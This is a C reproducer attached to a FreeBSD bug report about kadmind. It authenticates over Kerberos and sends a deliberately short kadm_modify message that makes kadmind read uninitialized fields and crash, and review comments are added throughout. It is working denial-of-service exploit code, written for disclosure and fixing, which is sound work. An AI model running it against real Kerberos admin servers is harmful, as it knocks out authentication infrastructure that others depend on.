FreeBSD Bugzilla – Attachment 238312 Details for
Bug 267972
kadmind can use uninitialized ent.tl_data...tl_data_contents and tl_data_length
crash kadmind with a short kadm_modify message
kadmind16a.c (text/plain), 3.09 KB, created by
Robert Morris
on 2022-11-24 18:29:58 UTC
Description:
crash kadmind with a short kadm_modify message
Creator:
Robert Morris
Created:
2022-11-24 18:29:58 UTC
Size:
3.09 KB
patch
obsolete
/*
 * Reproducer attached to FreeBSD bug 267972 ("kadmind can use uninitialized
 * ent.tl_data...tl_data_contents and tl_data_length").
 *
 * What it does, as written: authenticates to a kadmind listening on
 * 127.0.0.1:749 with krb5_sendauth, sends a 4-byte all-zero message, then
 * sends a 61-byte fixed-pattern message.  The report states that the short
 * kadm_modify message makes kadmind read tl_data fields it never initialized.
 *
 * This file exists so maintainers can confirm the report; the defect to fix
 * is on the server side (kadmind must reject a request that is too short to
 * carry the fields it goes on to read, or initialize `ent` before use).
 * Running it requires a local kadmind and credentials krb5_sendauth can use.
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ctype.h>
#include <fcntl.h>
#include <signal.h>
#include <krb5.h>

// XOR pattern applied, one 64-bit word at a time, over the 0x80-filled
// request buffer in main().  Taken verbatim from the report; the resulting
// byte layout is not decoded here.
unsigned long long aa[] = {
0x85808080ull,
0x0ull,
0x0ull,
0x8080808000000000ull,
0x0ull,
0x0ull,
0x0ull,
0x73840000ull,
};
// Next index into aa[]; advanced once per 8-byte word in the loop below.
int aai;

int
main(){
    // A peer that closes the connection early must not terminate this process.
    signal(SIGPIPE, SIG_IGN);

    int status;

    krb5_context context;
    assert(krb5_init_context(&context) == 0);

    // Target: the kadmin port on the local host.
    struct sockaddr_in sin;
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr("127.0.0.1");
    sin.sin_port = htons(749);

    // NOTE(review): the socket() result is not checked before connect().
    int s = socket(AF_INET, SOCK_STREAM, 0);
    int ret = connect(s, (struct sockaddr *)&sin, sizeof(sin));
    if(ret < 0){
        perror("connect");
        exit(1);
    }

    krb5_auth_context auth_context = NULL;
    assert(krb5_auth_con_init(context, &auth_context) == 0);

    assert(krb5_auth_con_setaddrs_from_fd(context, auth_context, &s) == 0);

    // Service principal for the kadmin server ("kadmin/admin" style name).
    krb5_principal server;
    assert(krb5_sname_to_principal(context, "admin", "kadmin", KRB5_NT_SRV_HST, &server) == 0);

    // Application-level authentication; "KADM0.1" is the protocol version
    // string exchanged with kadmind.
    status = krb5_sendauth(context,
                           &auth_context,
                           &s,
                           "KADM0.1",
                           NULL,
                           server,
                           0,
                           NULL,
                           NULL,
                           NULL,
                           NULL,
                           NULL,
                           NULL);
    if(status)
        krb5_err(context, 1, status, "krb5_sendauth");

    {
        // send zero mask for params / realm
        char buf[4];
        memset(buf, 0, sizeof(buf));
        krb5_data data;
        data.data = buf;
        data.length = sizeof(buf);
        krb5_data packet;
        krb5_data_zero(&packet);
        status = krb5_mk_priv(context,
                              auth_context,
                              &data,
                              &packet,
                              NULL);
        // NOTE(review): the label says krb5_mk_safe but the call is krb5_mk_priv.
        if(status)
            krb5_err(context, 1, status, "krb5_mk_safe");
        // Wire format used by this exchange: 4-byte big-endian length, then
        // the sealed packet.
        int len = packet.length;
        int net_len = htonl(len);
        if(krb5_net_write(context, &s, &net_len, 4) != 4){
            perror("krb5_net_write");
            exit(1);
        }
        if(krb5_net_write(context, &s, packet.data, len) != len){
            perror("krb5_net_write");
            exit(1);
        }
    }

// NN is the number of bytes actually sent; the buffer is padded to NN+7 so
// the 8-byte XOR loop below stays inside the array (68 bytes, 8 words, and
// aa[] has exactly 8 entries).
#define NN 61
    char buf[NN+7];
    memset(buf, 0x80, sizeof(buf));
    // NOTE(review): type-punning a char[] through a long long pointer is UB
    // under strict aliasing and assumes the array is suitably aligned.
    for(int i = 0; i+8 <= sizeof(buf); i += 8)
        *(long long *)(buf + i) ^= aa[aai++];

    // Only the first NN bytes form the request; the short length is the
    // condition the bug report is about.
    krb5_data data;
    data.data = buf;
    data.length = NN;

    krb5_data packet;
    krb5_data_zero(&packet);

    status = krb5_mk_priv(context,
                          auth_context,
                          &data,
                          &packet,
                          NULL);
    // NOTE(review): same mislabel as above (krb5_mk_safe vs krb5_mk_priv).
    if(status)
        krb5_err(context, 1, status, "krb5_mk_safe");

    // Unlike the first message, write failures here are reported but not fatal.
    int len = packet.length;
    int net_len = htonl(len);
    if(krb5_net_write(context, &s, &net_len, 4) != 4)
        perror("krb5_net_write");
    if(krb5_net_write(context, &s, packet.data, len) != len)
        perror("krb5_net_write");

    // Keep the connection open briefly before exit — presumably so the server
    // has processed the message before the socket is closed; not verified here.
    sleep(1);
}